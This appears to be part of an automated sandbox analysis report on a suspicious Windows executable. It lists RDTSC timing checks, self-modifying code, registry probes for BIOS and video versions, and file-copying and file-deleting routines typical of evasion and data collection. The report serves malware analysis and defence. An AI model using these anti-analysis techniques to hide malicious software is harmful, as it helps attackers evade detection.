              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFF1F second address: 11FFF32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8DCE2029Ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFF32 second address: 11FFF43 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8DCDE9E3Ah 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120159D second address: 12015A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209006 second address: 120900A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120900A second address: 120901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FB8DCE20296h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120901A second address: 120901E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12134C2 second address: 12134C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D43 second address: 1211D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D4D second address: 1211D72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCE20296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB8DCE202A3h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D72 second address: 1211D7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D7A second address: 1211D7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212075 second address: 1212096 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E36h 0x00000008 jmp 00007FB8DCDE9E3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007FB8DCDE9E3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12121DB second address: 12121EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FB8DCE20296h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212375 second address: 121237D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212509 second address: 121250D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12131CA second address: 12131E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB8DCDE9E47h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216341 second address: 121635F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCE202A9h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121635F second address: 1216396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FB8DCDE9E48h 0x00000015 pop ecx 0x00000016 jbe 00007FB8DCDE9E42h 0x0000001c jns 00007FB8DCDE9E36h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216396 second address: 121639A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121639A second address: 12163A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8DCDE9E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12200F1 second address: 1220115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jng 00007FB8DCE2029Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8DCE2029Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220115 second address: 122011B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B7E second address: 1225B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B87 second address: 1225B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E41h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B9C second address: 1225BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222529 second address: 1222534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222534 second address: 1222552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FB8DCE2029Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222552 second address: 1222556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A5C second address: 1232A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB8DCE20296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A68 second address: 1232A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A6E second address: 1232A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A72 second address: 1232A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236039 second address: 123604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jnp 00007FB8DCE202B3h 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF29 second address: 124AF33 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF33 second address: 124AF38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF38 second address: 124AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B0DD second address: 124B0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB8DCE20296h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B0EC second address: 124B106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8DCDE9E3Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B22A second address: 124B230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B762 second address: 124B768 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B768 second address: 124B76F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B76F second address: 124B797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB8DCDE9E36h 0x00000011 jmp 00007FB8DCDE9E47h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B797 second address: 124B79B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BA2B second address: 124BA45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E3Ch 0x0000000b jo 00007FB8DCDE9E3Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D261 second address: 124D267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D267 second address: 124D26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D26D second address: 124D271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D271 second address: 124D290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8DCDE9E40h 0x0000000c jne 00007FB8DCDE9E36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250155 second address: 125015B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125015B second address: 1250161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250161 second address: 1250165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250165 second address: 1250169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252CB6 second address: 1252CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE2029Bh 0x00000009 pop ecx 0x0000000a jg 00007FB8DCE2029Eh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252CD4 second address: 1252CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252CD9 second address: 1252CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FB8DCE2029Ch 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252CF4 second address: 1252CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0219 second address: 4FF0253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dx, 64CAh 0x0000000e pushfd 0x0000000f jmp 00007FB8DCE2029Bh 0x00000014 sub ax, EF6Eh 0x00000019 jmp 00007FB8DCE202A9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0253 second address: 4FF0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0259 second address: 4FF02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, ax 0x00000013 pop esi 0x00000014 jmp 00007FB8DCE2029Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB8DCE202A8h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02A7 second address: 4FF02AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02AB second address: 4FF02B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02B1 second address: 4FF02B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02B7 second address: 4FF02BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAFA8F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAFB45 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAD35E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E5EE7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26860
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25678
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D718A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D73910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00D72390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D723A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D74B10
